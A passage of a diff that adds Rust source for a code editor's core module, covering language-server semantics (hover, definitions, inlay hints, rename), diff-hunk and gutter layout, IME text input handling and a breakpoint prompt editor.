buffer.read(cx); + let snapshot = buffer.snapshot(); + if !snapshot.settings_at(position, cx).show_completions_on_input { + return false; + } + let classifier = snapshot.char_classifier_at(position).for_completion(true); + if trigger_in_words && classifier.is_word(char) { + return true; + } + + buffer.completion_triggers().contains(text) + } +} + +impl SemanticsProvider for Entity { + fn hover( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| project.hover(buffer, position, cx))) + } + + fn document_highlights( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>> { + Some(self.update(cx, |project, cx| { + project.document_highlights(buffer, position, cx) + })) + } + + fn definitions( + &self, + buffer: &Entity, + position: text::Anchor, + kind: GotoDefinitionKind, + cx: &mut App, + ) -> Option>>> { + Some(self.update(cx, |project, cx| match kind { + GotoDefinitionKind::Symbol => project.definition(&buffer, position, cx), + GotoDefinitionKind::Declaration => project.declaration(&buffer, position, cx), + GotoDefinitionKind::Type => project.type_definition(&buffer, position, cx), + GotoDefinitionKind::Implementation => project.implementation(&buffer, position, cx), + })) + } + + fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool { + // TODO: make this work for remote projects + self.update(cx, |project, cx| { + if project + .active_debug_session(cx) + .is_some_and(|(session, _)| session.read(cx).any_stopped_thread()) + { + return true; + } + + buffer.update(cx, |buffer, cx| { + project.any_language_server_supports_inlay_hints(buffer, cx) + }) + }) + } + + fn inline_values( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>> { + self.update(cx, |project, cx| { + let (session, active_stack_frame) = project.active_debug_session(cx)?; + + Some(project.inline_values(session, active_stack_frame, buffer_handle, range, cx)) + }) + } + + fn inlay_hints( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>> { + Some(self.update(cx, |project, cx| { + project.inlay_hints(buffer_handle, range, cx) + })) + } + + fn resolve_inlay_hint( + &self, + hint: InlayHint, + buffer_handle: Entity, + server_id: LanguageServerId, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| { + project.resolve_inlay_hint(hint, buffer_handle, server_id, cx) + })) + } + + fn range_for_rename( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>> { + Some(self.update(cx, |project, cx| { + let buffer = buffer.clone(); + let task = project.prepare_rename(buffer.clone(), position, cx); + cx.spawn(async move |_, cx| { + Ok(match task.await? { + PrepareRenameResponse::Success(range) => Some(range), + PrepareRenameResponse::InvalidPosition => None, + PrepareRenameResponse::OnlyUnpreparedRenameSupported => { + // Fallback on using TreeSitter info to determine identifier range + buffer.update(cx, |buffer, _| { + let snapshot = buffer.snapshot(); + let (range, kind) = snapshot.surrounding_word(position); + if kind != Some(CharKind::Word) { + return None; + } + Some( + snapshot.anchor_before(range.start) + ..snapshot.anchor_after(range.end), + ) + })? + } + }) + }) + })) + } + + fn perform_rename( + &self, + buffer: &Entity, + position: text::Anchor, + new_name: String, + cx: &mut App, + ) -> Option>> { + Some(self.update(cx, |project, cx| { + project.perform_rename(buffer.clone(), position, new_name, cx) + })) + } +} + +fn inlay_hint_settings( + location: Anchor, + snapshot: &MultiBufferSnapshot, + cx: &mut Context, +) -> InlayHintSettings { + let file = snapshot.file_at(location); + let language = snapshot.language_at(location).map(|l| l.name()); + language_settings(language, file, cx).inlay_hints +} + +fn consume_contiguous_rows( + contiguous_row_selections: &mut Vec>, + selection: &Selection, + display_map: &DisplaySnapshot, + selections: &mut Peekable>>, +) -> (MultiBufferRow, MultiBufferRow) { + contiguous_row_selections.push(selection.clone()); + let start_row = MultiBufferRow(selection.start.row); + let mut end_row = ending_row(selection, display_map); + + while let Some(next_selection) = selections.peek() { + if next_selection.start.row <= end_row.0 { + end_row = ending_row(next_selection, display_map); + contiguous_row_selections.push(selections.next().unwrap().clone()); + } else { + break; + } + } + (start_row, end_row) +} + +fn ending_row(next_selection: &Selection, display_map: &DisplaySnapshot) -> MultiBufferRow { + if next_selection.end.column > 0 || next_selection.is_empty() { + MultiBufferRow(display_map.next_line_boundary(next_selection.end).0.row + 1) + } else { + MultiBufferRow(next_selection.end.row) + } +} + +impl EditorSnapshot { + pub fn remote_selections_in_range<'a>( + &'a self, + range: &'a Range, + collaboration_hub: &dyn CollaborationHub, + cx: &'a App, + ) -> impl 'a + Iterator { + let participant_names = collaboration_hub.user_names(cx); + let participant_indices = collaboration_hub.user_participant_indices(cx); + let collaborators_by_peer_id = collaboration_hub.collaborators(cx); + let collaborators_by_replica_id = collaborators_by_peer_id + .iter() + .map(|(_, collaborator)| (collaborator.replica_id, collaborator)) + .collect::>(); + self.buffer_snapshot + .selections_in_range(range, false) + .filter_map(move |(replica_id, line_mode, cursor_shape, selection)| { + let collaborator = collaborators_by_replica_id.get(&replica_id)?; + let participant_index = participant_indices.get(&collaborator.user_id).copied(); + let user_name = participant_names.get(&collaborator.user_id).cloned(); + Some(RemoteSelection { + replica_id, + selection, + cursor_shape, + line_mode, + participant_index, + peer_id: collaborator.peer_id, + user_name, + }) + }) + } + + pub fn hunks_for_ranges( + &self, + ranges: impl IntoIterator>, + ) -> Vec { + let mut hunks = Vec::new(); + let mut processed_buffer_rows: HashMap>> = + HashMap::default(); + for query_range in ranges { + let query_rows = + MultiBufferRow(query_range.start.row)..MultiBufferRow(query_range.end.row + 1); + for hunk in self.buffer_snapshot.diff_hunks_in_range( + Point::new(query_rows.start.0, 0)..Point::new(query_rows.end.0, 0), + ) { + // Include deleted hunks that are adjacent to the query range, because + // otherwise they would be missed. + let mut intersects_range = hunk.row_range.overlaps(&query_rows); + if hunk.status().is_deleted() { + intersects_range |= hunk.row_range.start == query_rows.end; + intersects_range |= hunk.row_range.end == query_rows.start; + } + if intersects_range { + if !processed_buffer_rows + .entry(hunk.buffer_id) + .or_default() + .insert(hunk.buffer_range.start..hunk.buffer_range.end) + { + continue; + } + hunks.push(hunk); + } + } + } + + hunks + } + + fn display_diff_hunks_for_rows<'a>( + &'a self, + display_rows: Range, + folded_buffers: &'a HashSet, + ) -> impl 'a + Iterator { + let buffer_start = DisplayPoint::new(display_rows.start, 0).to_point(self); + let buffer_end = DisplayPoint::new(display_rows.end, 0).to_point(self); + + self.buffer_snapshot + .diff_hunks_in_range(buffer_start..buffer_end) + .filter_map(|hunk| { + if folded_buffers.contains(&hunk.buffer_id) { + return None; + } + + let hunk_start_point = Point::new(hunk.row_range.start.0, 0); + let hunk_end_point = Point::new(hunk.row_range.end.0, 0); + + let hunk_display_start = self.point_to_display_point(hunk_start_point, Bias::Left); + let hunk_display_end = self.point_to_display_point(hunk_end_point, Bias::Right); + + let display_hunk = if hunk_display_start.column() != 0 { + DisplayDiffHunk::Folded { + display_row: hunk_display_start.row(), + } + } else { + let mut end_row = hunk_display_end.row(); + if hunk_display_end.column() > 0 { + end_row.0 += 1; + } + let is_created_file = hunk.is_created_file(); + DisplayDiffHunk::Unfolded { + status: hunk.status(), + diff_base_byte_range: hunk.diff_base_byte_range, + display_row_range: hunk_display_start.row()..end_row, + multi_buffer_range: Anchor::range_in_buffer( + hunk.excerpt_id, + hunk.buffer_id, + hunk.buffer_range, + ), + is_created_file, + } + }; + + Some(display_hunk) + }) + } + + pub fn language_at(&self, position: T) -> Option<&Arc> { + self.display_snapshot.buffer_snapshot.language_at(position) + } + + pub fn is_focused(&self) -> bool { + self.is_focused + } + + pub fn placeholder_text(&self) -> Option<&Arc> { + self.placeholder_text.as_ref() + } + + pub fn scroll_position(&self) -> gpui::Point { + self.scroll_anchor.scroll_position(&self.display_snapshot) + } + + fn gutter_dimensions( + &self, + font_id: FontId, + font_size: Pixels, + max_line_number_width: Pixels, + cx: &App, + ) -> Option { + if !self.show_gutter { + return None; + } + + let descent = cx.text_system().descent(font_id, font_size); + let em_width = cx.text_system().em_width(font_id, font_size).log_err()?; + let em_advance = cx.text_system().em_advance(font_id, font_size).log_err()?; + + let show_git_gutter = self.show_git_diff_gutter.unwrap_or_else(|| { + matches!( + ProjectSettings::get_global(cx).git.git_gutter, + Some(GitGutterSetting::TrackedFiles) + ) + }); + let gutter_settings = EditorSettings::get_global(cx).gutter; + let show_line_numbers = self + .show_line_numbers + .unwrap_or(gutter_settings.line_numbers); + let line_gutter_width = if show_line_numbers { + // Avoid flicker-like gutter resizes when the line number gains another digit and only resize the gutter on files with N*10^5 lines. + let min_width_for_number_on_gutter = em_advance * MIN_LINE_NUMBER_DIGITS as f32; + max_line_number_width.max(min_width_for_number_on_gutter) + } else { + 0.0.into() + }; + + let show_code_actions = self + .show_code_actions + .unwrap_or(gutter_settings.code_actions); + + let show_runnables = self.show_runnables.unwrap_or(gutter_settings.runnables); + let show_breakpoints = self.show_breakpoints.unwrap_or(gutter_settings.breakpoints); + + let git_blame_entries_width = + self.git_blame_gutter_max_author_length + .map(|max_author_length| { + let renderer = cx.global::().0.clone(); + const MAX_RELATIVE_TIMESTAMP: &str = "60 minutes ago"; + + /// The number of characters to dedicate to gaps and margins. + const SPACING_WIDTH: usize = 4; + + let max_char_count = max_author_length.min(renderer.max_author_length()) + + ::git::SHORT_SHA_LENGTH + + MAX_RELATIVE_TIMESTAMP.len() + + SPACING_WIDTH; + + em_advance * max_char_count + }); + + let is_singleton = self.buffer_snapshot.is_singleton(); + + let mut left_padding = git_blame_entries_width.unwrap_or(Pixels::ZERO); + left_padding += if !is_singleton { + em_width * 4.0 + } else if show_code_actions || show_runnables || show_breakpoints { + em_width * 3.0 + } else if show_git_gutter && show_line_numbers { + em_width * 2.0 + } else if show_git_gutter || show_line_numbers { + em_width + } else { + px(0.) + }; + + let shows_folds = is_singleton && gutter_settings.folds; + + let right_padding = if shows_folds && show_line_numbers { + em_width * 4.0 + } else if shows_folds || (!is_singleton && show_line_numbers) { + em_width * 3.0 + } else if show_line_numbers { + em_width + } else { + px(0.) + }; + + Some(GutterDimensions { + left_padding, + right_padding, + width: line_gutter_width + left_padding + right_padding, + margin: -descent, + git_blame_entries_width, + }) + } + + pub fn render_crease_toggle( + &self, + buffer_row: MultiBufferRow, + row_contains_cursor: bool, + editor: Entity, + window: &mut Window, + cx: &mut App, + ) -> Option { + let folded = self.is_line_folded(buffer_row); + let mut is_foldable = false; + + if let Some(crease) = self + .crease_snapshot + .query_row(buffer_row, &self.buffer_snapshot) + { + is_foldable = true; + match crease { + Crease::Inline { render_toggle, .. } | Crease::Block { render_toggle, .. } => { + if let Some(render_toggle) = render_toggle { + let toggle_callback = + Arc::new(move |folded, window: &mut Window, cx: &mut App| { + if folded { + editor.update(cx, |editor, cx| { + editor.fold_at(buffer_row, window, cx) + }); + } else { + editor.update(cx, |editor, cx| { + editor.unfold_at(buffer_row, window, cx) + }); + } + }); + return Some((render_toggle)( + buffer_row, + folded, + toggle_callback, + window, + cx, + )); + } + } + } + } + + is_foldable |= self.starts_indent(buffer_row); + + if folded || (is_foldable && (row_contains_cursor || self.gutter_hovered)) { + Some( + Disclosure::new(("gutter_crease", buffer_row.0), !folded) + .toggle_state(folded) + .on_click(window.listener_for(&editor, move |this, _e, window, cx| { + if folded { + this.unfold_at(buffer_row, window, cx); + } else { + this.fold_at(buffer_row, window, cx); + } + })) + .into_any_element(), + ) + } else { + None + } + } + + pub fn render_crease_trailer( + &self, + buffer_row: MultiBufferRow, + window: &mut Window, + cx: &mut App, + ) -> Option { + let folded = self.is_line_folded(buffer_row); + if let Crease::Inline { render_trailer, .. } = self + .crease_snapshot + .query_row(buffer_row, &self.buffer_snapshot)? + { + let render_trailer = render_trailer.as_ref()?; + Some(render_trailer(buffer_row, folded, window, cx)) + } else { + None + } + } +} + +impl Deref for EditorSnapshot { + type Target = DisplaySnapshot; + + fn deref(&self) -> &Self::Target { + &self.display_snapshot + } +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum EditorEvent { + InputIgnored { + text: Arc, + }, + InputHandled { + utf16_range_to_replace: Option>, + text: Arc, + }, + ExcerptsAdded { + buffer: Entity, + predecessor: ExcerptId, + excerpts: Vec<(ExcerptId, ExcerptRange)>, + }, + ExcerptsRemoved { + ids: Vec, + removed_buffer_ids: Vec, + }, + BufferFoldToggled { + ids: Vec, + folded: bool, + }, + ExcerptsEdited { + ids: Vec, + }, + ExcerptsExpanded { + ids: Vec, + }, + BufferEdited, + Edited { + transaction_id: clock::Lamport, + }, + Reparsed(BufferId), + Focused, + FocusedIn, + Blurred, + DirtyChanged, + Saved, + TitleChanged, + DiffBaseChanged, + SelectionsChanged { + local: bool, + }, + ScrollPositionChanged { + local: bool, + autoscroll: bool, + }, + Closed, + TransactionUndone { + transaction_id: clock::Lamport, + }, + TransactionBegun { + transaction_id: clock::Lamport, + }, + Reloaded, + CursorShapeChanged, + PushedToNavHistory { + anchor: Anchor, + is_deactivate: bool, + }, +} + +impl EventEmitter for Editor {} + +impl Focusable for Editor { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for Editor { + fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { + let settings = ThemeSettings::get_global(cx); + + let mut text_style = match self.mode { + EditorMode::SingleLine { .. } | EditorMode::AutoHeight { .. } => TextStyle { + color: cx.theme().colors().editor_foreground, + font_family: settings.ui_font.family.clone(), + font_features: settings.ui_font.features.clone(), + font_fallbacks: settings.ui_font.fallbacks.clone(), + font_size: rems(0.875).into(), + font_weight: settings.ui_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }, + EditorMode::Full { .. } => TextStyle { + color: cx.theme().colors().editor_foreground, + font_family: settings.buffer_font.family.clone(), + font_features: settings.buffer_font.features.clone(), + font_fallbacks: settings.buffer_font.fallbacks.clone(), + font_size: settings.buffer_font_size(cx).into(), + font_weight: settings.buffer_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }, + }; + if let Some(text_style_refinement) = &self.text_style_refinement { + text_style.refine(text_style_refinement) + } + + let background = match self.mode { + EditorMode::SingleLine { .. } => cx.theme().system().transparent, + EditorMode::AutoHeight { max_lines: _ } => cx.theme().system().transparent, + EditorMode::Full { .. } => cx.theme().colors().editor_background, + }; + + EditorElement::new( + &cx.entity(), + EditorStyle { + background, + local_player: cx.theme().players().local(), + text: text_style, + scrollbar_width: EditorElement::SCROLLBAR_WIDTH, + syntax: cx.theme().syntax().clone(), + status: cx.theme().status().clone(), + inlay_hints_style: make_inlay_hints_style(cx), + inline_completion_styles: make_suggestion_styles(cx), + unnecessary_code_fade: ThemeSettings::get_global(cx).unnecessary_code_fade, + }, + ) + } +} + +impl EntityInputHandler for Editor { + fn text_for_range( + &mut self, + range_utf16: Range, + adjusted_range: &mut Option>, + _: &mut Window, + cx: &mut Context, + ) -> Option { + let snapshot = self.buffer.read(cx).read(cx); + let start = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.start), Bias::Left); + let end = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.end), Bias::Right); + if (start.0..end.0) != range_utf16 { + adjusted_range.replace(start.0..end.0); + } + Some(snapshot.text_for_range(start..end).collect()) + } + + fn selected_text_range( + &mut self, + ignore_disabled_input: bool, + _: &mut Window, + cx: &mut Context, + ) -> Option { + // Prevent the IME menu from appearing when holding down an alphabetic key + // while input is disabled. + if !ignore_disabled_input && !self.input_enabled { + return None; + } + + let selection = self.selections.newest::(cx); + let range = selection.range(); + + Some(UTF16Selection { + range: range.start.0..range.end.0, + reversed: selection.reversed, + }) + } + + fn marked_text_range(&self, _: &mut Window, cx: &mut Context) -> Option> { + let snapshot = self.buffer.read(cx).read(cx); + let range = self.text_highlights::(cx)?.1.first()?; + Some(range.start.to_offset_utf16(&snapshot).0..range.end.to_offset_utf16(&snapshot).0) + } + + fn unmark_text(&mut self, _: &mut Window, cx: &mut Context) { + self.clear_highlights::(cx); + self.ime_transaction.take(); + } + + fn replace_text_in_range( + &mut self, + range_utf16: Option>, + text: &str, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + cx.emit(EditorEvent::InputIgnored { text: text.into() }); + return; + } + + self.transact(window, cx, |this, window, cx| { + let new_selected_ranges = if let Some(range_utf16) = range_utf16 { + let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); + Some(this.selection_replacement_ranges(range_utf16, cx)) + } else { + this.marked_text_ranges(cx) + }; + + let range_to_replace = new_selected_ranges.as_ref().and_then(|ranges_to_replace| { + let newest_selection_id = this.selections.newest_anchor().id; + this.selections + .all::(cx) + .iter() + .zip(ranges_to_replace.iter()) + .find_map(|(selection, range)| { + if selection.id == newest_selection_id { + Some( + (range.start.0 as isize - selection.head().0 as isize) + ..(range.end.0 as isize - selection.head().0 as isize), + ) + } else { + None + } + }) + }); + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: range_to_replace, + text: text.into(), + }); + + if let Some(new_selected_ranges) = new_selected_ranges { + this.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selected_ranges) + }); + this.backspace(&Default::default(), window, cx); + } + + this.handle_input(text, window, cx); + }); + + if let Some(transaction) = self.ime_transaction { + self.buffer.update(cx, |buffer, cx| { + buffer.group_until_transaction(transaction, cx); + }); + } + + self.unmark_text(window, cx); + } + + fn replace_and_mark_text_in_range( + &mut self, + range_utf16: Option>, + text: &str, + new_selected_range_utf16: Option>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + return; + } + + let transaction = self.transact(window, cx, |this, window, cx| { + let ranges_to_replace = if let Some(mut marked_ranges) = this.marked_text_ranges(cx) { + let snapshot = this.buffer.read(cx).read(cx); + if let Some(relative_range_utf16) = range_utf16.as_ref() { + for marked_range in &mut marked_ranges { + marked_range.end.0 = marked_range.start.0 + relative_range_utf16.end; + marked_range.start.0 += relative_range_utf16.start; + marked_range.start = + snapshot.clip_offset_utf16(marked_range.start, Bias::Left); + marked_range.end = + snapshot.clip_offset_utf16(marked_range.end, Bias::Right); + } + } + Some(marked_ranges) + } else if let Some(range_utf16) = range_utf16 { + let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); + Some(this.selection_replacement_ranges(range_utf16, cx)) + } else { + None + }; + + let range_to_replace = ranges_to_replace.as_ref().and_then(|ranges_to_replace| { + let newest_selection_id = this.selections.newest_anchor().id; + this.selections + .all::(cx) + .iter() + .zip(ranges_to_replace.iter()) + .find_map(|(selection, range)| { + if selection.id == newest_selection_id { + Some( + (range.start.0 as isize - selection.head().0 as isize) + ..(range.end.0 as isize - selection.head().0 as isize), + ) + } else { + None + } + }) + }); + + cx.emit(EditorEvent::InputHandled { + utf16_range_to_replace: range_to_replace, + text: text.into(), + }); + + if let Some(ranges) = ranges_to_replace { + this.change_selections(None, window, cx, |s| s.select_ranges(ranges)); + } + + let marked_ranges = { + let snapshot = this.buffer.read(cx).read(cx); + this.selections + .disjoint_anchors() + .iter() + .map(|selection| { + selection.start.bias_left(&snapshot)..selection.end.bias_right(&snapshot) + }) + .collect::>() + }; + + if text.is_empty() { + this.unmark_text(window, cx); + } else { + this.highlight_text::( + marked_ranges.clone(), + HighlightStyle { + underline: Some(UnderlineStyle { + thickness: px(1.), + color: None, + wavy: false, + }), + ..Default::default() + }, + cx, + ); + } + + // Disable auto-closing when composing text (i.e. typing a `"` on a Brazilian keyboard) + let use_autoclose = this.use_autoclose; + let use_auto_surround = this.use_auto_surround; + this.set_use_autoclose(false); + this.set_use_auto_surround(false); + this.handle_input(text, window, cx); + this.set_use_autoclose(use_autoclose); + this.set_use_auto_surround(use_auto_surround); + + if let Some(new_selected_range) = new_selected_range_utf16 { + let snapshot = this.buffer.read(cx).read(cx); + let new_selected_ranges = marked_ranges + .into_iter() + .map(|marked_range| { + let insertion_start = marked_range.start.to_offset_utf16(&snapshot).0; + let new_start = OffsetUtf16(new_selected_range.start + insertion_start); + let new_end = OffsetUtf16(new_selected_range.end + insertion_start); + snapshot.clip_offset_utf16(new_start, Bias::Left) + ..snapshot.clip_offset_utf16(new_end, Bias::Right) + }) + .collect::>(); + + drop(snapshot); + this.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selected_ranges) + }); + } + }); + + self.ime_transaction = self.ime_transaction.or(transaction); + if let Some(transaction) = self.ime_transaction { + self.buffer.update(cx, |buffer, cx| { + buffer.group_until_transaction(transaction, cx); + }); + } + + if self.text_highlights::(cx).is_none() { + self.ime_transaction.take(); + } + } + + fn bounds_for_range( + &mut self, + range_utf16: Range, + element_bounds: gpui::Bounds, + window: &mut Window, + cx: &mut Context, + ) -> Option> { + let text_layout_details = self.text_layout_details(window); + let gpui::Size { + width: em_width, + height: line_height, + } = self.character_size(window); + + let snapshot = self.snapshot(window, cx); + let scroll_position = snapshot.scroll_position(); + let scroll_left = scroll_position.x * em_width; + + let start = OffsetUtf16(range_utf16.start).to_display_point(&snapshot); + let x = snapshot.x_for_display_point(start, &text_layout_details) - scroll_left + + self.gutter_dimensions.width + + self.gutter_dimensions.margin; + let y = line_height * (start.row().as_f32() - scroll_position.y); + + Some(Bounds { + origin: element_bounds.origin + point(x, y), + size: size(em_width, line_height), + }) + } + + fn character_index_for_point( + &mut self, + point: gpui::Point, + _window: &mut Window, + _cx: &mut Context, + ) -> Option { + let position_map = self.last_position_map.as_ref()?; + if !position_map.text_hitbox.contains(&point) { + return None; + } + let display_point = position_map.point_for_position(point).previous_valid; + let anchor = position_map + .snapshot + .display_point_to_anchor(display_point, Bias::Left); + let utf16_offset = anchor.to_offset_utf16(&position_map.snapshot.buffer_snapshot); + Some(utf16_offset.0) + } +} + +trait SelectionExt { + fn display_range(&self, map: &DisplaySnapshot) -> Range; + fn spanned_rows( + &self, + include_end_if_at_line_start: bool, + map: &DisplaySnapshot, + ) -> Range; +} + +impl SelectionExt for Selection { + fn display_range(&self, map: &DisplaySnapshot) -> Range { + let start = self + .start + .to_point(&map.buffer_snapshot) + .to_display_point(map); + let end = self + .end + .to_point(&map.buffer_snapshot) + .to_display_point(map); + if self.reversed { + end..start + } else { + start..end + } + } + + fn spanned_rows( + &self, + include_end_if_at_line_start: bool, + map: &DisplaySnapshot, + ) -> Range { + let start = self.start.to_point(&map.buffer_snapshot); + let mut end = self.end.to_point(&map.buffer_snapshot); + if !include_end_if_at_line_start && start.row != end.row && end.column == 0 { + end.row -= 1; + } + + let buffer_start = map.prev_line_boundary(start).0; + let buffer_end = map.next_line_boundary(end).0; + MultiBufferRow(buffer_start.row)..MultiBufferRow(buffer_end.row + 1) + } +} + +impl InvalidationStack { + fn invalidate(&mut self, selections: &[Selection], buffer: &MultiBufferSnapshot) + where + S: Clone + ToOffset, + { + while let Some(region) = self.last() { + let all_selections_inside_invalidation_ranges = + if selections.len() == region.ranges().len() { + selections + .iter() + .zip(region.ranges().iter().map(|r| r.to_offset(buffer))) + .all(|(selection, invalidation_range)| { + let head = selection.head().to_offset(buffer); + invalidation_range.start <= head && invalidation_range.end >= head + }) + } else { + false + }; + + if all_selections_inside_invalidation_ranges { + break; + } else { + self.pop(); + } + } + } +} + +impl Default for InvalidationStack { + fn default() -> Self { + Self(Default::default()) + } +} + +impl Deref for InvalidationStack { + type Target = Vec; + + fn deref(&self) -> &Self::Target { + &self.0 + } +} + +impl DerefMut for InvalidationStack { + fn deref_mut(&mut self) -> &mut Self::Target { + &mut self.0 + } +} + +impl InvalidationRegion for SnippetState { + fn ranges(&self) -> &[Range] { + &self.ranges[self.active_index] + } +} + +fn inline_completion_edit_text( + current_snapshot: &BufferSnapshot, + edits: &[(Range, String)], + edit_preview: &EditPreview, + include_deletions: bool, + cx: &App, +) -> HighlightedText { + let edits = edits + .iter() + .map(|(anchor, text)| { + ( + anchor.start.text_anchor..anchor.end.text_anchor, + text.clone(), + ) + }) + .collect::>(); + + edit_preview.highlight_edits(current_snapshot, &edits, include_deletions, cx) +} + +pub fn diagnostic_style(severity: DiagnosticSeverity, colors: &StatusColors) -> Hsla { + match severity { + DiagnosticSeverity::ERROR => colors.error, + DiagnosticSeverity::WARNING => colors.warning, + DiagnosticSeverity::INFORMATION => colors.info, + DiagnosticSeverity::HINT => colors.info, + _ => colors.ignored, + } +} + +pub fn styled_runs_for_code_label<'a>( + label: &'a CodeLabel, + syntax_theme: &'a theme::SyntaxTheme, +) -> impl 'a + Iterator, HighlightStyle)> { + let fade_out = HighlightStyle { + fade_out: Some(0.35), + ..Default::default() + }; + + let mut prev_end = label.filter_range.end; + label + .runs + .iter() + .enumerate() + .flat_map(move |(ix, (range, highlight_id))| { + let style = if let Some(style) = highlight_id.style(syntax_theme) { + style + } else { + return Default::default(); + }; + let mut muted_style = style; + muted_style.highlight(fade_out); + + let mut runs = SmallVec::<[(Range, HighlightStyle); 3]>::new(); + if range.start >= label.filter_range.end { + if range.start > prev_end { + runs.push((prev_end..range.start, fade_out)); + } + runs.push((range.clone(), muted_style)); + } else if range.end <= label.filter_range.end { + runs.push((range.clone(), style)); + } else { + runs.push((range.start..label.filter_range.end, style)); + runs.push((label.filter_range.end..range.end, muted_style)); + } + prev_end = cmp::max(prev_end, range.end); + + if ix + 1 == label.runs.len() && label.text.len() > prev_end { + runs.push((prev_end..label.text.len(), fade_out)); + } + + runs + }) +} + +pub(crate) fn split_words(text: &str) -> impl std::iter::Iterator + '_ { + let mut prev_index = 0; + let mut prev_codepoint: Option = None; + text.char_indices() + .chain([(text.len(), '\0')]) + .filter_map(move |(index, codepoint)| { + let prev_codepoint = prev_codepoint.replace(codepoint)?; + let is_boundary = index == text.len() + || !prev_codepoint.is_uppercase() && codepoint.is_uppercase() + || !prev_codepoint.is_alphanumeric() && codepoint.is_alphanumeric(); + if is_boundary { + let chunk = &text[prev_index..index]; + prev_index = index; + Some(chunk) + } else { + None + } + }) +} + +pub trait RangeToAnchorExt: Sized { + fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range; + + fn to_display_points(self, snapshot: &EditorSnapshot) -> Range { + let anchor_range = self.to_anchors(&snapshot.buffer_snapshot); + anchor_range.start.to_display_point(snapshot)..anchor_range.end.to_display_point(snapshot) + } +} + +impl RangeToAnchorExt for Range { + fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range { + let start_offset = self.start.to_offset(snapshot); + let end_offset = self.end.to_offset(snapshot); + if start_offset == end_offset { + snapshot.anchor_before(start_offset)..snapshot.anchor_before(end_offset) + } else { + snapshot.anchor_after(self.start)..snapshot.anchor_before(self.end) + } + } +} + +pub trait RowExt { + fn as_f32(&self) -> f32; + + fn next_row(&self) -> Self; + + fn previous_row(&self) -> Self; + + fn minus(&self, other: Self) -> u32; +} + +impl RowExt for DisplayRow { + fn as_f32(&self) -> f32 { + self.0 as f32 + } + + fn next_row(&self) -> Self { + Self(self.0 + 1) + } + + fn previous_row(&self) -> Self { + Self(self.0.saturating_sub(1)) + } + + fn minus(&self, other: Self) -> u32 { + self.0 - other.0 + } +} + +impl RowExt for MultiBufferRow { + fn as_f32(&self) -> f32 { + self.0 as f32 + } + + fn next_row(&self) -> Self { + Self(self.0 + 1) + } + + fn previous_row(&self) -> Self { + Self(self.0.saturating_sub(1)) + } + + fn minus(&self, other: Self) -> u32 { + self.0 - other.0 + } +} + +trait RowRangeExt { + type Row; + + fn len(&self) -> usize; + + fn iter_rows(&self) -> impl DoubleEndedIterator; +} + +impl RowRangeExt for Range { + type Row = MultiBufferRow; + + fn len(&self) -> usize { + (self.end.0 - self.start.0) as usize + } + + fn iter_rows(&self) -> impl DoubleEndedIterator { + (self.start.0..self.end.0).map(MultiBufferRow) + } +} + +impl RowRangeExt for Range { + type Row = DisplayRow; + + fn len(&self) -> usize { + (self.end.0 - self.start.0) as usize + } + + fn iter_rows(&self) -> impl DoubleEndedIterator { + (self.start.0..self.end.0).map(DisplayRow) + } +} + +/// If select range has more than one line, we +/// just point the cursor to range.start. +fn collapse_multiline_range(range: Range) -> Range { + if range.start.row == range.end.row { + range + } else { + range.start..range.start + } +} +pub struct KillRing(ClipboardItem); +impl Global for KillRing {} + +const UPDATE_DEBOUNCE: Duration = Duration::from_millis(50); + +enum BreakpointPromptEditAction { + Log, + Condition, + HitCondition, +} + +struct BreakpointPromptEditor { + pub(crate) prompt: Entity, + editor: WeakEntity, + breakpoint_anchor: Anchor, + breakpoint: Breakpoint, + edit_action: BreakpointPromptEditAction, + block_ids: HashSet, + gutter_dimensions: Arc>, + _subscriptions: Vec, +} + +impl BreakpointPromptEditor { + const MAX_LINES: u8 = 4; + + fn new( + editor: WeakEntity, + breakpoint_anchor: Anchor, + breakpoint: Breakpoint, + edit_action: BreakpointPromptEditAction, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let base_text = match edit_action { + BreakpointPromptEditAction::Log => breakpoint.message.as_ref(), + BreakpointPromptEditAction::Condition => breakpoint.condition.as_ref(), + BreakpointPromptEditAction::HitCondition => breakpoint.hit_condition.as_ref(), + } + .map(|msg| msg.to_string()) + .unwrap_or_default(); + + let buffer = cx.new(|cx| Buffer::local(base_text, cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + + let prompt = cx.new(|cx| { + let mut prompt = Editor::new( + EditorMode::AutoHeight { + max_lines: Self::MAX_LINES as usize, + }, + buffer, + None, + window, + cx, + ); + prompt.set_soft_wrap_mode(language::language_settings::SoftWrap::EditorWidth, cx); + prompt.set_show_cursor_when_unfocused(false, cx); + prompt.set_placeholder_text( + match edit_action { + BreakpointPromptEditAction::Log => "Message to log when a breakpoint is hit. Expressions within {} are interpolated.", + BreakpointPromptEditAction::Condition => "Condition when a breakpoint is hit. Expressions within {} are interpolated.", + BreakpointPromptEditAction::HitCondition => "How many breakpoint hits to ignore", + }, + cx, + ); + + prompt + }); + + Self { + prompt, + editor, + breakpoint_anchor, + breakpoint, + edit_action, + gutter_dimensions: 